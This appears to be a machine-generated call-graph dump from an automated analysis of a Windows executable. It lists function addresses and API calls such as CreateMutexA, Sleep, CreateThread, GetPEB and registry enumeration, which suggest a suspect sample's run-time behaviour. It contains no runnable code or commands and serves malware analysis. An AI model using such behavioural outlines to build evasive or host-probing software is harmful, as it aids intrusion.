37518->37520 37521 ad8158 37518->37521 37525 ad8169 Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37518->37525 37523 add3e2 ListArray RtlAllocateHeap 37520->37523 37520->37525 37521->37517 37524 add3e2 ListArray RtlAllocateHeap 37521->37524 37522 ad81f8 37523->37525 37524->37525 37526 ad81d0 Concurrency::details::ContextBase::GetArbitraryAlias 37525->37526 37608 ad9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37525->37608 37526->37365 37527->37382 37528->37406 37529->37410 37530->37412 37532 ad8339 37531->37532 37533 ad834d __InternalCxxFrameHandler 37532->37533 37610 ad8f40 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37532->37610 37533->37414 37535->37435 37536->37449 37539 add3e7 ListArray 37537->37539 37540 add401 37539->37540 37541 ac2480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37539->37541 37546 af8be1 37539->37546 37540->37460 37542 add40d Concurrency::details::_TaskCollection::~_TaskCollection Concurrency::details::ResourceManager::ResourceManager 37541->37542 37550 af38af RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy 37541->37550 37544 ac24c3 37544->37460 37545->37460 37549 afb04b ListArray _unexpected 37546->37549 37547 afb074 RtlAllocateHeap 37548 afb087 __dosmaperr 37547->37548 37547->37549 37548->37539 37549->37547 37549->37548 37550->37544 37577 ad7f80 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 37551->37577 37553 ac596b 37554 ac59e0 37553->37554 37578 ad7f80 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 37554->37578 37556 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37568 ac5a45 37556->37568 37557 ac5c09 37580 ad8200 RtlAllocateHeap 37557->37580 37558 ac5bdd __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37558->37489 37561 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37561->37568 37568->37556 37568->37557 37568->37558 37568->37561 37579 ac5730 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37568->37579 37571 ac4dc2 37570->37571 37575 ac4b92 37570->37575 37571->37491 37572 ac4ce5 37572->37571 37583 ad8ca0 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37572->37583 37575->37572 37581 af6da6 GetPEB GetPEB RtlAllocateHeap __fassign 37575->37581 37582 ad8ca0 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37575->37582 37577->37553 37578->37568 37579->37568 37581->37575 37582->37575 37583->37572 37585 ad777b 37584->37585 37592 ad7864 Concurrency::details::ContextBase::GetArbitraryAlias std::_Rethrow_future_exception 37584->37592 37589 ad77ea 37585->37589 37590 ad7811 37585->37590 37585->37592 37595 ad77fb Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37585->37595 37587 ad78f6 37599 ac2480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 37587->37599 37589->37587 37594 add3e2 ListArray RtlAllocateHeap 37589->37594 37593 add3e2 ListArray RtlAllocateHeap 37590->37593 37590->37595 37591 ad78fb 37592->37494 37593->37595 37594->37595 37595->37592 37598 ad9270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37595->37598 37596->37496 37597->37498 37599->37591 37601 ad9294 37600->37601 37604 ad92a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37601->37604 37606 ad94e0 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37601->37606 37603 ad932b 37603->37506 37604->37506 37605->37507 37606->37603 37609->37522 37610->37533 37635 aceb4e 37636 aceb50 GetFileAttributesA 37635->37636 37637 aceb62 37636->37637 37638 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37637->37638 37639 aced60 37638->37639 37640 ac5c10 4 API calls 37639->37640 37641 aced68 37640->37641 37642 ad83c0 RtlAllocateHeap 37641->37642 37643 aced7d 37642->37643 37644 ad8220 RtlAllocateHeap 37643->37644 37645 aced8c GetFileAttributesA 37644->37645 37649 aceda9 37645->37649 37647 acf699 Concurrency::details::ContextBase::GetArbitraryAlias 37648 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37648->37649 37649->37647 37649->37648 37650 acf6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 37649->37650 37651 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37650->37651 37652 acf727 37651->37652 37653 ac5c10 4 API calls 37652->37653 37654 acf72e 37653->37654 37655 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37654->37655 37656 acf741 37655->37656 37657 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37656->37657 37658 acf756 37657->37658 37659 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37658->37659 37660 acf76b 37659->37660 37661 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37660->37661 37662 acf77d 37661->37662 37732 ace530 12 API calls 3 library calls 37662->37732 37664 acf786 37665 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37664->37665 37666 acf7aa 37665->37666 37667 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37666->37667 37668 acf7ba 37667->37668 37669 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37668->37669 37670 acf7d7 37669->37670 37671 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37670->37671 37673 acf7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37671->37673 37672 acf982 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37673->37672 37674 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37673->37674 37675 acfa04 37674->37675 37676 ac5c10 4 API calls 37675->37676 37677 acfa0b 37676->37677 37678 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37677->37678 37679 acfa1e 37678->37679 37680 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37679->37680 37681 acfa33 37680->37681 37682 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37681->37682 37683 acfa48 37682->37683 37684 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37683->37684 37685 acfa5a 37684->37685 37733 ace530 12 API calls 3 library calls 37685->37733 37687 acfb35 Concurrency::details::ContextBase::GetArbitraryAlias 37688 acfa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 37688->37687 37689 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37688->37689 37690 acfba5 37689->37690 37734 ac9580 4 API calls 3 library calls 37690->37734 37692 acfbb4 37735 ac9230 4 API calls 3 library calls 37692->37735 37694 acfbc3 37695 ad8320 RtlAllocateHeap 37694->37695 37696 acfbdb 37695->37696 37696->37696 37697 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37696->37697 37698 acfc8c 37697->37698 37699 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37698->37699 37700 acfca7 37699->37700 37701 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37700->37701 37702 acfcb9 37701->37702 37703 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37702->37703 37704 ad05d4 37703->37704 37705 ac5c10 4 API calls 37704->37705 37706 ad05db 37705->37706 37707 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37706->37707 37708 ad05f1 37707->37708 37709 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37708->37709 37710 ad0609 37709->37710 37711 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37710->37711 37712 ad0621 37711->37712 37713 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37712->37713 37714 ad0633 37713->37714 37736 ace530 12 API calls 3 library calls 37714->37736 37716 ad0880 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37717 ad063c Concurrency::details::_CancellationTokenState::_RegisterCallback 37717->37716 37718 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37717->37718 37719 ad0987 37718->37719 37720 ac5c10 4 API calls 37719->37720 37721 ad098e 37720->37721 37722 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37721->37722 37723 ad09a4 37722->37723 37724 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37723->37724 37725 ad09bc 37724->37725 37726 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37725->37726 37727 ad09d4 37726->37727 37728 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37727->37728 37729 ad12e0 37728->37729 37737 ace530 12 API calls 3 library calls 37729->37737 37731 ad12e9 37732->37664 37733->37688 37734->37692 37735->37694 37736->37717 37737->37731 37750 ac9ba5 GetFileAttributesA 37754 ac9bb5 Concurrency::details::ContextBase::GetArbitraryAlias 37750->37754 37751 ac9c80 Concurrency::details::ContextBase::GetArbitraryAlias 37755 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37751->37755 37752 aca91c Concurrency::details::_CancellationTokenState::_RegisterCallback 37753 aca960 Sleep CreateMutexA 37752->37753 37758 aca98e 37753->37758 37754->37751 37754->37752 37756 aca903 37755->37756 37757 aca9a7 37758->37757 37761 af6629 GetPEB GetPEB __FrameHandler3::FrameUnwindToState 37758->37761 37760 aca9b0 37761->37760 37762 ad6d00 CreateThread 37763 ad6d20 Sleep 37762->37763 37764 ad6c70 37762->37764 37763->37763 37767 ad6ca0 37764->37767 37765 ad7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37765->37767 37766 ac5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37766->37767 37767->37765 37767->37766 37770 ad47b0 37767->37770 37769 ad6cec Sleep 37769->37767 37771 ad47eb 37770->37771 37852 ad4e70 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37770->37852 37772 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37771->37772 37771->37852 37773 ad480c 37772->37773 37774 ac5c10 4 API calls 37773->37774 37775 ad4813 37774->37775 37776 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37775->37776 37777 ad4825 37776->37777 37778 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37777->37778 37779 ad4837 37778->37779 37780 acbe30 10 API calls 37779->37780 37781 ad4843 37780->37781 37782 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37781->37782 37783 ad4858 37782->37783 37784 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37783->37784 37785 ad4870 37784->37785 37786 ac5c10 4 API calls 37785->37786 37787 ad4877 37786->37787 37788 ac8580 RtlAllocateHeap 37787->37788 37789 ad4883 37788->37789 37790 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37789->37790 37849 ad4afd 37789->37849 37792 ad489f 37790->37792 37791 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37793 ad4b2f 37791->37793 37794 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37792->37794 37795 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37793->37795 37796 ad48b7 37794->37796 37797 ad4b44 37795->37797 37798 ac5c10 4 API calls 37796->37798 37799 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37797->37799 37800 ad48be 37798->37800 37801 ad4b56 37799->37801 37802 ac8580 RtlAllocateHeap 37800->37802 37803 acbe30 10 API calls 37801->37803 37804 ad48ca 37802->37804 37805 ad4b62 37803->37805 37807 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37804->37807 37804->37849 37806 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37805->37806 37808 ad4b77 37806->37808 37810 ad48e7 37807->37810 37809 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37808->37809 37812 ad4b8f 37809->37812 37811 ac5c10 4 API calls 37810->37811 37816 ad48ef 37811->37816 37813 ac5c10 4 API calls 37812->37813 37814 ad4b96 37813->37814 37815 ac8580 RtlAllocateHeap 37814->37815 37817 ad4ba2 37815->37817 37818 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37816->37818 37819 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37817->37819 37817->37852 37823 ad4959 Concurrency::details::ContextBase::GetArbitraryAlias 37818->37823 37820 ad4bbe 37819->37820 37821 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37820->37821 37822 ad4bd6 37821->37822 37825 ac5c10 4 API calls 37822->37825 37824 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37823->37824 37826 ad49e6 37824->37826 37827 ad4bdd 37825->37827 37828 ac5c10 4 API calls 37826->37828 37829 ac8580 RtlAllocateHeap 37827->37829 37833 ad49ee 37828->37833 37830 ad4be9 37829->37830 37831 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37830->37831 37830->37852 37832 ad4c06 37831->37832 37834 ac5c10 4 API calls 37832->37834 37835 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37833->37835 37836 ad4c0e 37834->37836 37837 ad4a49 Concurrency::details::ContextBase::GetArbitraryAlias 37835->37837 37838 ad4c5a 37836->37838 37839 ad4f97 37836->37839 37837->37849 37888 ac98f0 37837->37888 37842 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37838->37842 37897 ad8200 RtlAllocateHeap 37839->37897 37847 ad4c78 Concurrency::details::ContextBase::GetArbitraryAlias 37842->37847 37843 ad4f9c 37898 adc1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::_TaskCollection::~_TaskCollection 37843->37898 37845 ad4ad5 __dosmaperr 37845->37849 37893 af8ab6 37845->37893 37848 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37847->37848 37847->37852 37850 ad4d05 37848->37850 37849->37791 37849->37843 37851 ac5c10 4 API calls 37850->37851 37853 ad4d0d 37851->37853 37852->37769 37854 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37853->37854 37856 ad4d68 Concurrency::details::ContextBase::GetArbitraryAlias 37854->37856 37855 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37857 ad4df7 37855->37857 37856->37852 37856->37855 37858 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37857->37858 37859 ad4e0c 37858->37859 37860 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37859->37860 37861 ad4e27 37860->37861 37862 ac5c10 4 API calls 37861->37862 37863 ad4e2e 37862->37863 37864 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37863->37864 37865 ad4e67 37864->37865 37867 ad4390 37865->37867 37868 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37867->37868 37869 ad43d2 37868->37869 37870 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37869->37870 37871 ad43e4 37870->37871 37872 ac8580 RtlAllocateHeap 37871->37872 37873 ad43ed 37872->37873 37874 ad4646 37873->37874 37885 ad43f8 Concurrency::details::ContextBase::GetArbitraryAlias 37873->37885 37875 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37874->37875 37876 ad4657 37875->37876 37877 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37876->37877 37879 ad466c 37877->37879 37878 ad80c0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37878->37885 37880 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37879->37880 37882 ad467e 37880->37882 37881 ad9280 RtlAllocateHeap 37881->37885 37883 ad3640 12 API calls 37882->37883 37884 ad4610 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 37883->37884 37884->37852 37885->37878 37885->37881 37885->37884 37886 ad7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37885->37886 37899 ad3640 37885->37899 37886->37885 37889 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37888->37889 37890 ac991e 37889->37890 37891 ac5c10 4 API calls 37890->37891 37892 ac9927 Concurrency::details::ContextBase::GetArbitraryAlias ListArray __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37891->37892 37892->37845 37894 af8ad1 37893->37894 38021 af8868 37894->38021 37896 af8adb 37896->37849 37898->37852 37900 ad367f 37899->37900 37934 ad3e6f Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ Concurrency::details::_CancellationTokenState::_RegisterCallback 37899->37934 37901 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37900->37901 37902 ad36b0 37901->37902 37903 ad4327 37902->37903 37905 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37902->37905 38016 ad8200 RtlAllocateHeap 37903->38016 37907 ad36ff 37905->37907 37906 ad432c 38017 ad8200 RtlAllocateHeap 37906->38017 37907->37903 37909 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37907->37909 37910 ad3743 37909->37910 37910->37903 37911 ad3765 37910->37911 37913 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37911->37913 37912 ad4331 Concurrency::details::_CancellationTokenState::_RegisterCallback 38018 ad8200 RtlAllocateHeap 37912->38018 37915 ad3785 37913->37915 37916 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37915->37916 37917 ad3798 37916->37917 37918 ac5c10 4 API calls 37917->37918 37921 ad37a3 37918->37921 37919 ad4340 Concurrency::details::_CancellationTokenState::_RegisterCallback 38019 adc199 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::_TaskCollection::~_TaskCollection 37919->38019 37921->37906 37922 ad37ef 37921->37922 37923 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37922->37923 37927 ad3811 Concurrency::details::ContextBase::GetArbitraryAlias 37923->37927 37925 ac98f0 4 API calls 37926 ad3872 37925->37926 37928 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37926->37928 37933 ad3c79 Concurrency::details::ContextBase::GetArbitraryAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 37926->37933 37927->37912 37927->37925 37929 ad3889 37928->37929 37930 ac5c10 4 API calls 37929->37930 37931 ad3894 37930->37931 37932 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37931->37932 37935 ad38dc Concurrency::details::ContextBase::GetArbitraryAlias 37932->37935 37933->37934 38020 adc1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::_TaskCollection::~_TaskCollection 37933->38020 37934->37885 37935->37912 37936 ad39bd 37935->37936 37987 ad3ab7 Concurrency::details::ContextBase::GetArbitraryAlias __dosmaperr 37935->37987 37937 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37936->37937 37939 ad39da 37937->37939 37938 af8ab6 3 API calls 37940 ad3b7a 37938->37940 38012 acad70 4 API calls 4 library calls 37939->38012 37940->37919 37942 ad3b89 37940->37942 37942->37933 37943 ad3c8d 37942->37943 37944 ad3e74 37942->37944 37945 ad3ba2 37942->37945 37946 ad3f42 37942->37946 37952 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37943->37952 37950 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37944->37950 37948 ad80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37945->37948 37953 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37946->37953 37947 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37951 ad3a96 37947->37951 37956 ad3bca 37948->37956 37949 ad39e5 Concurrency::details::ContextBase::GetArbitraryAlias 37949->37919 37949->37947 37957 ad3e9c 37950->37957 37958 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37951->37958 37954 ad3cb5 37952->37954 37955 ad3f56 37953->37955 37961 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37954->37961 37962 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37955->37962 37963 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37956->37963 37959 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37957->37959 37960 ad3aa8 37958->37960 37964 ad3eba 37959->37964 38013 ac49a0 RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias Concurrency::details::_CancellationTokenState::_RegisterCallback 37960->38013 37966 ad3cd3 37961->37966 37967 ad3f6e 37962->37967 37968 ad3be8 37963->37968 37969 ac5c10 4 API calls 37964->37969 37970 ac5c10 4 API calls 37966->37970 37971 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37967->37971 37972 ac5c10 4 API calls 37968->37972 37973 ad3ec1 37969->37973 37974 ad3cda 37970->37974 37975 ad3f86 37971->37975 37976 ad3bef 37972->37976 37977 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37973->37977 37978 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37974->37978 37979 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37975->37979 37980 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37976->37980 37982 ad3ed9 37977->37982 37983 ad3cef 37978->37983 37984 ad3f98 37979->37984 37981 ad3c07 37980->37981 37985 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37981->37985 37986 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37982->37986 37988 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37983->37988 38015 ad2f10 12 API calls 4 library calls 37984->38015 37990 ad3c1f 37985->37990 37991 ad3ef1 37986->37991 37987->37919 37987->37938 37992 ad3d07 37988->37992 37993 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37990->37993 37994 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37991->37994 37995 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37992->37995 37996 ad3c37 37993->37996 37997 ad3f09 37994->37997 37998 ad3d1f 37995->37998 37999 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37996->37999 38000 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37997->38000 38001 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37998->38001 38002 ad3c4f 37999->38002 38003 ad3f21 38000->38003 38004 ad3d37 38001->38004 38005 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38002->38005 38006 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38003->38006 38007 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38004->38007 38008 ad3c67 38005->38008 38006->38008 38009 ad3d49 38007->38009 38011 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38008->38011 38014 ad1ec0 12 API calls 4 library calls 38009->38014 38011->37933 38012->37949 38013->37987 38014->37933 38015->37933 38020->37934 38022 af887a 38021->38022 38024 af888f __dosmaperr __wsopen_s 38022->38024 38027 af690a 38022->38027 38024->37896 38026 af88bf 38026->38024 38035 af6d52 GetPEB GetPEB RtlAllocateHeap __fassign __wsopen_s 38026->38035 38028 af692a 38027->38028 38029 af6921 38027->38029 38028->38029 38036 afa671 GetPEB GetPEB __FrameHandler3::FrameUnwindToState _unexpected __freea 38028->38036 38029->38026 38031 af694a 38037 afb5fb GetPEB GetPEB __fassign 38031->38037 38033 af6960 38038 afb628 GetPEB GetPEB __fassign 38033->38038 38035->38026 38036->38031 38037->38033 38038->38029 38063 add762 38072 add76e ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 38063->38072 38064 add8ce ___scrt_fastfail 38099 af6629 GetPEB GetPEB __FrameHandler3::FrameUnwindToState 38064->38099 38066 add8db 38100 af65ed GetPEB GetPEB __FrameHandler3::FrameUnwindToState 38066->38100 38068 add8e3 ___security_init_cookie 38070 add8e9 __scrt_common_main_seh 38068->38070 38069 add7be 38071 add83f 38082 af95bc 38071->38082 38072->38064 38072->38069 38072->38071 38098 af6603 GetPEB GetPEB __FrameHandler3::FrameUnwindToState _unexpected 38072->38098 38075 add845 38086 ad6d30 38075->38086 38083 af95c5 38082->38083 38085 af95ca 38082->38085 38101 af9320 38083->38101 38085->38075 38125 aca960 Sleep CreateMutexA 38086->38125 38090 ad6d45 38091 acd6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 38090->38091 38092 ad6d4a 38091->38092 38093 ad4fc0 7 API calls 38092->38093 38094 ad6d4f 38093->38094 38095 ac6020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 38094->38095 38096 ad6d54 38095->38096 38097 ac6020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 38096->38097 38097->38096 38098->38071 38099->38066 38100->38068 38102 af9329 38101->38102 38104 af9336 38101->38104 38102->38104 38105 af934c 38102->38105 38104->38085 38106 af9358 38105->38106 38107 af9355 38105->38107 38112 afe669 38106->38112 38107->38104 38111 af9364 __freea 38111->38104 38113 af935f 38112->38113 38114 afe672 38112->38114 38118 afea0a 38113->38118 38122 afa72e GetPEB GetPEB __FrameHandler3::FrameUnwindToState _unexpected __freea 38114->38122 38116 afe695 38123 afe4b0 3 API calls 4 library calls 38116->38123 38119 afea18 __cftof 38118->38119 38121 afea4a __cftof __freea 38119->38121 38124 afb04b RtlAllocateHeap ListArray __dosmaperr _unexpected 38119->38124 38121->38111 38122->38116 38123->38113 38124->38121 38127 aca98e 38125->38127 38126 aca9a7 38130 acce40 38126->38130 38127->38126 38135 af6629 GetPEB GetPEB __FrameHandler3::FrameUnwindToState 38127->38135 38129 aca9b0 38131 ad7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38130->38131 38132 acce92 38131->38132 38133 ac5c10 4 API calls 38132->38133 38134 acce9d 38133->38134 38135->38129 38148 af6dda 38149 af6de8 38148->38149 38150 af6df6 38148->38150 38151 af6e4c 8 API calls 38149->38151 38159 af698d 38150->38159 38153 af6df2 38151->38153 38154 af6e10 38162 af68ed 38154->38162 38158 af6e24 __freea 38160 af690a __fassign 2 API calls 38159->38160 38161 af699f __wsopen_s 38160->38161 38161->38154 38176 af683b 38162->38176 38164 af6905 38164->38158 38165 af6e4c 38164->38165 38166 af6e77 ListArray 38165->38166 38171 af6e5a __dosmaperr __wsopen_s 38165->38171 38167 af6eb9 CreateFileW 38166->38167 38175 af6e9d __dosmaperr __wsopen_s 38166->38175 38168 af6edd 38167->38168 38169 af6eeb 38167->38169 38185 af6fb4 GetFileType 38168->38185 38197 af6f2a 